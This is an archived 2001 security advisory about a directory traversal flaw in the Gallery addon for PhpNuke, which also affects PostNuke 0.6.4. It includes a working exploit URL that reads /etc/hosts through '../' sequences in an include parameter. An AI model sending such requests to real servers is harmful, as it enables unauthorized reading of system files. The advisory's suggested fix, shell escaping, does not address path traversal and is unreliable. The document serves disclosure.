TUCoPS :: Web :: PHP
:: web4864.htm
PhpNuke - Gallery Addon for PhpNuke, remote file access
20th Nov 2001 [SBWID-4864]
COMMAND
Gallery Addon for PhpNuke, remote file access
SYSTEMS AFFECTED
??
PROBLEM
Aur駘ien Cabezon [http://www.iSecureLabs.com] found :
[1] Description
Gallery is an intuitive web based photo gallery with authenticated
users and privileged albums. Photo management includes automatic
thumbnails, resizing, rotation, etc. Gallery is available as a Nuke 5.0
module.
Gallery Addon is vulnerable to the ../.. bug that allow remote file
reading on the web server as whatever user runs the web server.
[2] Exploit
http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&;
name=gallery&file=index&inclu
de=../../../../../../etc/hosts
update
======
postnuke 0.6.4 is also vulnerable
SOLUTION
Coder has been alerted [http://www.menalto.com/projects/gallery-nuke/].
An easy way to fix such a vulnerability is to use the PHP included
\"system escapeshell\" function.